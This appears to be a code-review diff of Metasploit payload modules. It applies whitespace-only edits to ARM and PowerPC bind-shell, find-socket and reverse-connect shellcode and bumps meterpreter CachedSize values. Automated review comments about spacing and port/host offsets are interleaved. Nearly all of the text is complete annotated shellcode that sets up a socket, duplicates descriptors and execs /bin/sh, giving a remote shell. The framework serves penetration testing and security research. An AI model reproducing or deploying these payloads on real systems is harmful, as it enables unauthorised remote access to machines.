"\x02\x0f" + # lsl r7, r1, #8 #
"\x37\x19" + # add r7, r7, #0x19 #
"\xdf\x01" + # svc 1 #
"\x1c\x06" + # mov r6, r0 #
# bind()
"\x22\x02" +# mov r2, #2 #
"\x02\x12" +# lsl r2, r2, #8 #
"\x32"+bytehigh +# add r2, r2, #0xXX #
"\x02\x12" +# lsl r2, r2, #8 #
"\x32"+bytelow +# add r2, r2, #0xXX #
"\x1a\xdb" +# sub r3, r3, r3 #
"\x1b\x24" +# sub r4, r4, r4 #
"\x1b\x6d" +# sub r5, r5, r5 #
"\x46\x69" +# mov r1, sp #
"\xc1\x3c" +# stm r1!, {r2-r5} #
"\x39\x10" +# sub r1, #0x10 #
"\x22\x10" +# mov r2, #16 #
"\x37\x01" +# add r7, r7, #1 #
"\xdf\x01" +# svc 1 #
"\x22\x02" + # mov r2, #2 #
"\x02\x12" + # lsl r2, r2, #8 #
"\x32"+bytehigh + # add r2, r2, #0xXX #
"\x02\x12" + # lsl r2, r2, #8 #
"\x32"+bytelow + # add r2, r2, #0xXX #
"\x1a\xdb" + # sub r3, r3, r3 #
"\x1b\x24" + # sub r4, r4, r4 #
"\x1b\x6d" + # sub r5, r5, r5 #
"\x46\x69" + # mov r1, sp #
"\xc1\x3c" + # stm r1!, {r2-r5} #
"\x39\x10" + # sub r1, #0x10 #
"\x22\x10" + # mov r2, #16 #
"\x37\x01" + # add r7, r7, #1 #
"\xdf\x01" + # svc 1 #
# listen()
"\x1c\x30" +# mov r0, r6 #
"\x1a\x49" +# sub r1, r1, r1 #
"\x37\x02" +# add r7, r7, #2 #
"\xdf\x01" +# svc 1 #
"\x1c\x30" + # mov r0, r6 #
"\x1a\x49" + # sub r1, r1, r1 #
"\x37\x02" + # add r7, r7, #2 #
"\xdf\x01" + # svc 1 #
# accept()
"\x1c\x30" +# mov r0, r6 #
"\x1a\x92" +# sub r2, r2, r2 #
"\x37\x01" +# add r7, r7, #1 #
"\xdf\x01" +# svc 1 #
"\x1c\x06" +# mov r6, r0 #
"\x1c\x30" + # mov r0, r6 #
"\x1a\x92" + # sub r2, r2, r2 #
"\x37\x01" + # add r7, r7, #1 #
"\xdf\x01" + # svc 1 #
"\x1c\x06" + # mov r6, r0 #
# dup2()
"\x1a\x49" +# sub r1, r1, r1 #
"\x27\x3f" +# mov r7, #63 #
"\xdf\x01" +# svc 1 #
"\x1c\x30" +# mov r0, r6 #
"\x31\x01" +# add r1, r1, #1 #
"\xdf\x01" +# svc 1 #
"\x1c\x30" +# mov r0, r6 #
"\x31\x01" +# add r1, r1, #1 #
"\xdf\x01" +# svc 1 #
"\x1a\x49" + # sub r1, r1, r1 #
"\x27\x3f" + # mov r7, #63 #
"\xdf\x01" + # svc 1 #
"\x1c\x30" + # mov r0, r6 #
"\x31\x01" + # add r1, r1, #1 #
"\xdf\x01" + # svc 1 #
"\x1c\x30" + # mov r0, r6 #
"\x31\x01" + # add r1, r1, #1 #
"\xdf\x01" + # svc 1 #
# execve()
"\x1a\x92" +# sub r2, r2, r2 #
"\x46\x78" +# mov r0, pc #
"\x30\x12" +# add r0, #18 #
"\x92\x02" +# str r2, [sp, #8] #
"\x90\x01" +# str r0, [sp, #4] #
"\xa9\x01" +# add r1, sp, #4 #
"\x27\x0b" +# mov r7, #11 #
"\xdf\x01" +# svc 1 #
"\x1a\x92" + # sub r2, r2, r2 #
"\x46\x78" + # mov r0, pc #
"\x30\x12" + # add r0, #18 #
"\x92\x02" + # str r2, [sp, #8] #
"\x90\x01" + # str r0, [sp, #4] #
"\xa9\x01" + # add r1, sp, #4 #
"\x27\x0b" + # mov r7, #11 #
"\xdf\x01" + # svc 1 #
# exit()
"\x1b\x24" +# sub r4, r4, r4 #
"\x1c\x20" +# mov r0, r4 #
"\x27\x01" +# mov r7, #1 #
"\xdf\x01" +# svc 1 #
"\x1b\x24" + # sub r4, r4, r4 #
"\x1c\x20" + # mov r0, r4 #
"\x27\x01" + # mov r7, #1 #
"\xdf\x01" + # svc 1 #
cmd
end
end
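Review bot: style: the two port-byte lines `"\x32"+bytehigh + # add r2, r2, #0xXX #` and `"\x32"+bytelow + # add r2, r2, #0xXX #` still have the `+` glued between the literal and the variable; spacing them as `"\x32" + bytehigh +` would match the convention this hunk applies everywhere else, and the `#0xXX` comments could state that the immediate is the high and low byte of the port patched in at generation time.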

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux'
module MetasploitModule
CachedSize = 903216
CachedSize = 903252
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux'
module MetasploitModule
CachedSize = 903216
CachedSize = 903252
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux'
module MetasploitModule
CachedSize = 903216
CachedSize = 903252
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux'
module MetasploitModule
CachedSize = 1388224
CachedSize = 1388296
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux'
module MetasploitModule
CachedSize = 1388224
CachedSize = 1388296
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux'
module MetasploitModule
CachedSize = 1388224
CachedSize = 1388296
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux'
module MetasploitModule
CachedSize = 1284772
CachedSize = 1284844
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux'
module MetasploitModule
CachedSize = 1284772
CachedSize = 1284844
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux'
module MetasploitModule
CachedSize = 1284772
CachedSize = 1284844
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux'
module MetasploitModule
CachedSize = 1286264
CachedSize = 1286336
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux'
module MetasploitModule
CachedSize = 1286264
CachedSize = 1286336
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux'
module MetasploitModule
CachedSize = 1286264
CachedSize = 1286336
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

@ -74,7 +74,7 @@ module MetasploitModule
port.pack("C2") + "\xce\x35" + # ori t6,t6,0x1f90
"\xe4\xff\xae\xaf" + # sw t6,-28(sp)
host[2..3].pack("C2") + "\x0e\x3c" + # lui t6,0x7f01
host[0..1].pack("C2") + "\xce\x35" +# ori t6,t6,0x101
host[0..1].pack("C2") + "\xce\x35" + # ori t6,t6,0x101
"\xe6\xff\xae\xaf" + # sw t6,-26(sp)
"\xe2\xff\xa5\x27" + # addiu a1,sp,-30
"\xef\xff\x0c\x24" + # li t4,-17
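Review bot: documentation: the comments `lui t6,0x7f01` and `ori t6,t6,0x101` on the host lines describe a 127.0.0.1 immediate, but the bytes actually come from host[2..3] and host[0..1] at generation time, so the literal in the comment is only the default and the comment should say so; the spacing fix on the `ori` line itself is correct and matches the `+ #` form already used by the surrounding context lines.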

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux'
module MetasploitModule
CachedSize = 1060824
CachedSize = 1060864
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux'
module MetasploitModule
CachedSize = 1060824
CachedSize = 1060864
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux'
module MetasploitModule
CachedSize = 1060824
CachedSize = 1060864
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions

@ -32,60 +32,60 @@ module MetasploitModule
'LPORT' => [ 58, 'n' ],
},
'Payload' =>
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
"\x3b\xa0\x01\xff" +# li r29,511 #
"\x3b\x9d\xfe\x02" +# addi r28,r29,-510 #
"\x3b\x7d\xfe\x03" +# addi r27,r29,-509 #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x97\x81\xff\xfc" +# stwu r28,-4(r1) #
"\x97\x61\xff\xfc" +# stwu r27,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x02" +# addi r3,r29,-510 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7c\x7a\x1b\x78" +# mr r26,r3 #
"\x3b\x3d\xfe\x11" +# addi r25,r29,-495 #
"\x3e\xe0\xff\x02" +# lis r23,-254 #
"\x62\xf7\x04\xd2" +# ori r23,r23,1234 #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x96\xe1\xff\xfc" +# stwu r23,-4(r1) #
"\x7c\x36\x0b\x78" +# mr r22,r1 #
"\x97\x21\xff\xfc" +# stwu r25,-4(r1) #
"\x96\xc1\xff\xfc" +# stwu r22,-4(r1) #
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x03" +# addi r3,r29,-509 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x05" +# addi r3,r29,-507 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x06" +# addi r3,r29,-506 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7c\x75\x1b\x78" +# mr r21,r3 #
"\x7f\x64\xdb\x78" +# mr r4,r27 #
"\x7e\xa3\xab\x78" +# mr r3,r21 #
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
"\x44\xff\xff\x02" +# sc #
"\x37\x7b\xff\xff" +# addic. r27,r27,-1 #
"\x40\x80\xff\xec" +# bge+ <bndsockcode+148> #
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel+ <bndsockcode+172> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
"\x94\xa1\xff\xfc" +# stwu r5,-4(r1) #
"\x94\x61\xff\xfc" +# stwu r3,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
"\x44\xff\xff\x02" +# sc #
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
"\x3b\xa0\x01\xff" + # li r29,511 #
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
"\x3b\x7d\xfe\x03" + # addi r27,r29,-509 #
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
"\x97\x81\xff\xfc" + # stwu r28,-4(r1) #
"\x97\x61\xff\xfc" + # stwu r27,-4(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x7d\xfe\x02" + # addi r3,r29,-510 #
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
"\x44\xff\xff\x02" + # sc #
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
"\x3b\x3d\xfe\x11" + # addi r25,r29,-495 #
"\x3e\xe0\xff\x02" + # lis r23,-254 #
"\x62\xf7\x04\xd2" + # ori r23,r23,1234 #
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
"\x96\xe1\xff\xfc" + # stwu r23,-4(r1) #
"\x7c\x36\x0b\x78" + # mr r22,r1 #
"\x97\x21\xff\xfc" + # stwu r25,-4(r1) #
"\x96\xc1\xff\xfc" + # stwu r22,-4(r1) #
"\x97\x41\xff\xfc" + # stwu r26,-4(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x7d\xfe\x03" + # addi r3,r29,-509 #
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
"\x44\xff\xff\x02" + # sc #
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
"\x97\x41\xff\xfc" + # stwu r26,-4(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x7d\xfe\x05" + # addi r3,r29,-507 #
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
"\x44\xff\xff\x02" + # sc #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x7d\xfe\x06" + # addi r3,r29,-506 #
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
"\x44\xff\xff\x02" + # sc #
"\x7c\x75\x1b\x78" + # mr r21,r3 #
"\x7f\x64\xdb\x78" + # mr r4,r27 #
"\x7e\xa3\xab\x78" + # mr r3,r21 #
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
"\x44\xff\xff\x02" + # sc #
"\x37\x7b\xff\xff" + # addic. r27,r27,-1 #
"\x40\x80\xff\xec" + # bge+ <bndsockcode+148> #
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
"\x40\x82\xff\xfd" + # bnel+ <bndsockcode+172> #
"\x7f\xc8\x02\xa6" + # mflr r30 #
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
"\x94\xa1\xff\xfc" + # stwu r5,-4(r1) #
"\x94\x61\xff\xfc" + # stwu r3,-4(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
"\x44\xff\xff\x02" + # sc #
"/bin/sh"
}
))
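Review bot: this is a whitespace-only rewrite of all 54 shellcode lines, and since every line is one 4-byte instruction the `'LPORT' => [ 58, 'n' ]` entry at the top of the hunk still lands on the low halfword of `ori r23,r23,1234` (instruction 15, bytes 56..59), so the offsets table does not need touching. Suggest confirming with `git diff -w` that the hunk collapses to nothing, and, as the lines are being touched anyway, the trailing ` #` after every comment carries no information and could be dropped.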

View File

@ -32,47 +32,47 @@ module MetasploitModule
'CPORT' => [ 86, 'n' ],
},
'Payload' =>
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
"\x3b\xa0\x01\xff" +# li r29,511 #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x7c\x3c\x0b\x78" +# mr r28,r1 #
"\x3b\x7d\xfe\x11" +# addi r27,r29,-495 #
"\x97\x61\xff\xfc" +# stwu r27,-4(r1) #
"\x7c\x3a\x0b\x78" +# mr r26,r1 #
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) #
"\x97\x81\xff\xfc" +# stwu r28,-4(r1) #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x3b\xff\x01\xff" +# addi r31,r31,511 #
"\x3b\xff\xfe\x02" +# addi r31,r31,-510 #
"\x38\x21\x01\xff" +# addi r1,r1,511 #
"\x38\x21\xfe\x05" +# addi r1,r1,-507 #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x08" +# addi r3,r29,-504 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x3b\x3c\x01\xff" +# addi r25,r28,511 #
"\xa3\x39\xfe\x03" +# lhz r25,-509(r25) #
"\x28\x19\x04\xd2" +# cmplwi r25,1234 #
"\x40\x82\xff\xd0" +# bne+ <fndsockcode+40> #
"\x3b\x1d\xfe\x03" +# addi r24,r29,-509 #
"\x7f\x04\xc3\x78" +# mr r4,r24 #
"\x7f\xe3\xfb\x78" +# mr r3,r31 #
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
"\x44\xff\xff\x02" +# sc #
"\x37\x18\xff\xff" +# addic. r24,r24,-1 #
"\x40\x80\xff\xec" +# bge+ <fndsockcode+96> #
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel+ <fndsockcode+120> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
"\x94\xa1\xff\xfc" +# stwu r5,-4(r1) #
"\x94\x61\xff\xfc" +# stwu r3,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
"\x44\xff\xff\x02" +# sc #
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
"\x3b\xa0\x01\xff" + # li r29,511 #
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
"\x7c\x3c\x0b\x78" + # mr r28,r1 #
"\x3b\x7d\xfe\x11" + # addi r27,r29,-495 #
"\x97\x61\xff\xfc" + # stwu r27,-4(r1) #
"\x7c\x3a\x0b\x78" + # mr r26,r1 #
"\x97\x41\xff\xfc" + # stwu r26,-4(r1) #
"\x97\x81\xff\xfc" + # stwu r28,-4(r1) #
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
"\x3b\xff\x01\xff" + # addi r31,r31,511 #
"\x3b\xff\xfe\x02" + # addi r31,r31,-510 #
"\x38\x21\x01\xff" + # addi r1,r1,511 #
"\x38\x21\xfe\x05" + # addi r1,r1,-507 #
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x7d\xfe\x08" + # addi r3,r29,-504 #
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
"\x44\xff\xff\x02" + # sc #
"\x3b\x3c\x01\xff" + # addi r25,r28,511 #
"\xa3\x39\xfe\x03" + # lhz r25,-509(r25) #
"\x28\x19\x04\xd2" + # cmplwi r25,1234 #
"\x40\x82\xff\xd0" + # bne+ <fndsockcode+40> #
"\x3b\x1d\xfe\x03" + # addi r24,r29,-509 #
"\x7f\x04\xc3\x78" + # mr r4,r24 #
"\x7f\xe3\xfb\x78" + # mr r3,r31 #
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
"\x44\xff\xff\x02" + # sc #
"\x37\x18\xff\xff" + # addic. r24,r24,-1 #
"\x40\x80\xff\xec" + # bge+ <fndsockcode+96> #
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
"\x40\x82\xff\xfd" + # bnel+ <fndsockcode+120> #
"\x7f\xc8\x02\xa6" + # mflr r30 #
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
"\x94\xa1\xff\xfc" + # stwu r5,-4(r1) #
"\x94\x61\xff\xfc" + # stwu r3,-4(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
"\x44\xff\xff\x02" + # sc #
"/bin/sh"
}
))
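Review bot: `'CPORT' => [ 86, 'n' ]` is consistent with the body: `cmplwi r25,1234` is the 22nd instruction, so its 16-bit immediate (the `\x04\xd2` placeholder) sits at bytes 86..87, and because this hunk only inserts a space before each `#` the byte layout is unchanged. One documentation point while these lines are open: the `addi r31,r31,511` / `addi r31,r31,-510` and `addi r1,r1,511` / `addi r1,r1,-507` pairs are the null-byte-free way of adding a small constant, and a short comment on the first pair would save the next reader working that out.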

View File

@ -33,50 +33,50 @@ module MetasploitModule
'LPORT' => [ 62, 'n' ],
},
'Payload' =>
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
"\x3b\xa0\x01\xff" +# li r29,511 #
"\x3b\x9d\xfe\x02" +# addi r28,r29,-510 #
"\x3b\x7d\xfe\x03" +# addi r27,r29,-509 #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x97\x81\xff\xfc" +# stwu r28,-4(r1) #
"\x97\x61\xff\xfc" +# stwu r27,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x02" +# addi r3,r29,-510 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7c\x7a\x1b\x78" +# mr r26,r3 #
"\x3b\x3d\xfe\x11" +# addi r25,r29,-495 #
"\x3e\xe0\x7f\x00" +# lis r23,32512 #
"\x62\xf7\x00\x01" +# ori r23,r23,1 #
"\x3a\xc0\x04\xd2" +# li r22,1234 #
"\x96\xe1\xff\xfc" +# stwu r23,-4(r1) #
"\x96\xc1\xff\xfc" +# stwu r22,-4(r1) #
"\x93\x61\xff\xfe" +# stw r27,-2(r1) #
"\x7c\x35\x0b\x78" +# mr r21,r1 #
"\x97\x21\xff\xfc" +# stwu r25,-4(r1) #
"\x96\xa1\xff\xfc" +# stwu r21,-4(r1) #
"\x97\x41\xff\xfc" +# stwu r26,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x04" +# addi r3,r29,-508 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7f\x64\xdb\x78" +# mr r4,r27 #
"\x7f\x43\xd3\x78" +# mr r3,r26 #
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
"\x44\xff\xff\x02" +# sc #
"\x37\x7b\xff\xff" +# addic. r27,r27,-1 #
"\x40\x80\xff\xec" +# bge+ <cntsockcode+108> #
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel+ <cntsockcode+132> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
"\x94\xa1\xff\xfc" +# stwu r5,-4(r1) #
"\x94\x61\xff\xfc" +# stwu r3,-4(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
"\x44\xff\xff\x02" +# sc #
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
"\x3b\xa0\x01\xff" + # li r29,511 #
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
"\x3b\x7d\xfe\x03" + # addi r27,r29,-509 #
"\x97\xe1\xff\xfc" + # stwu r31,-4(r1) #
"\x97\x81\xff\xfc" + # stwu r28,-4(r1) #
"\x97\x61\xff\xfc" + # stwu r27,-4(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x7d\xfe\x02" + # addi r3,r29,-510 #
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
"\x44\xff\xff\x02" + # sc #
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
"\x3b\x3d\xfe\x11" + # addi r25,r29,-495 #
"\x3e\xe0\x7f\x00" + # lis r23,32512 #
"\x62\xf7\x00\x01" + # ori r23,r23,1 #
"\x3a\xc0\x04\xd2" + # li r22,1234 #
"\x96\xe1\xff\xfc" + # stwu r23,-4(r1) #
"\x96\xc1\xff\xfc" + # stwu r22,-4(r1) #
"\x93\x61\xff\xfe" + # stw r27,-2(r1) #
"\x7c\x35\x0b\x78" + # mr r21,r1 #
"\x97\x21\xff\xfc" + # stwu r25,-4(r1) #
"\x96\xa1\xff\xfc" + # stwu r21,-4(r1) #
"\x97\x41\xff\xfc" + # stwu r26,-4(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x7d\xfe\x04" + # addi r3,r29,-508 #
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
"\x44\xff\xff\x02" + # sc #
"\x7f\x64\xdb\x78" + # mr r4,r27 #
"\x7f\x43\xd3\x78" + # mr r3,r26 #
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
"\x44\xff\xff\x02" + # sc #
"\x37\x7b\xff\xff" + # addic. r27,r27,-1 #
"\x40\x80\xff\xec" + # bge+ <cntsockcode+108> #
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
"\x40\x82\xff\xfd" + # bnel+ <cntsockcode+132> #
"\x7f\xc8\x02\xa6" + # mflr r30 #
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
"\x94\xa1\xff\xfc" + # stwu r5,-4(r1) #
"\x94\x61\xff\xfc" + # stwu r3,-4(r1) #
"\x7c\x24\x0b\x78" + # mr r4,r1 #
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
"\x44\xff\xff\x02" + # sc #
"/bin/sh"
}
))
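Review bot: `lis r23,32512` followed by `ori r23,r23,1` builds 0x7f000001 (127.0.0.1) as the LHOST placeholder and `li r22,1234` is the LPORT placeholder; `'LPORT' => [ 62, 'n' ]` matches (`li r22` is instruction 16, immediate at bytes 62..63). The LHOST entries sit above this hunk's context at line 33, so check they point at the low halfwords of those two instructions (bytes 54 and 58); this whitespace-only change does not move them.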

View File

@ -32,60 +32,60 @@ module MetasploitModule
'LPORT' => [ 58, 'n' ],
},
'Payload' =>
"\x7f\xff\xfa\x78" +# xor r31,r31,r31 #
"\x3b\xa0\x01\xff" +# li r29,511 #
"\x3b\x9d\xfe\x02" +# addi r28,r29,-510 #
"\x3b\x7d\xfe\x03" +# addi r27,r29,-509 #
"\xfb\xe1\xff\xf9" +# stdu r31,-8(r1) #
"\xfb\x81\xff\xf9" +# stdu r28,-8(r1) #
"\xfb\x61\xff\xf9" +# stdu r27,-8(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x02" +# addi r3,r29,-510 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7c\x7a\x1b\x78" +# mr r26,r3 #
"\x3b\x3d\xfe\x11" +# addi r25,r29,-495 #
"\x3e\xe0\xff\x02" +# lis r23,-254 #
"\x62\xf7\x04\xd2" +# ori r23,r23,1234 #
"\x97\xe1\xff\xfc" +# stwu r31,-4(r1) #
"\x96\xe1\xff\xfc" +# stwu r23,-4(r1) #
"\x7c\x36\x0b\x78" +# mr r22,r1 #
"\xfb\x21\xff\xf9" +# stdu r25,-8(r1) #
"\xfa\xc1\xff\xf9" +# stdu r22,-8(r1) #
"\xfb\x41\xff\xf9" +# stdu r26,-8(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x03" +# addi r3,r29,-509 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\xfb\xe1\xff\xf9" +# stdu r31,-8(r1) #
"\xfb\xe1\xff\xf9" +# stdu r31,-8(r1) #
"\xfb\x41\xff\xf9" +# stdu r26,-8(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x05" +# addi r3,r29,-507 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x7d\xfe\x06" +# addi r3,r29,-506 #
"\x38\x1d\xfe\x67" +# addi r0,r29,-409 #
"\x44\xff\xff\x02" +# sc #
"\x7c\x75\x1b\x78" +# mr r21,r3 #
"\x7f\x64\xdb\x78" +# mr r4,r27 #
"\x7e\xa3\xab\x78" +# mr r3,r21 #
"\x38\x1d\xfe\x40" +# addi r0,r29,-448 #
"\x44\xff\xff\x02" +# sc #
"\x37\x7b\xff\xff" +# addic. r27,r27,-1 #
"\x40\x80\xff\xec" +# bge+ <bndsockcode64+148> #
"\x7c\xa5\x2a\x79" +# xor. r5,r5,r5 #
"\x40\x82\xff\xfd" +# bnel+ <bndsockcode64+172> #
"\x7f\xc8\x02\xa6" +# mflr r30 #
"\x3b\xde\x01\xff" +# addi r30,r30,511 #
"\x38\x7e\xfe\x25" +# addi r3,r30,-475 #
"\x98\xbe\xfe\x2c" +# stb r5,-468(r30) #
"\xf8\xa1\xff\xf9" +# stdu r5,-8(r1) #
"\xf8\x61\xff\xf9" +# stdu r3,-8(r1) #
"\x7c\x24\x0b\x78" +# mr r4,r1 #
"\x38\x1d\xfe\x0c" +# addi r0,r29,-500 #
"\x44\xff\xff\x02" +# sc #
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
"\x3b\xa0\x01\xff" + # li r29,511 #
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
"\x3b\x7d\xfe\x03" + # addi r27,r29,-509 #
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
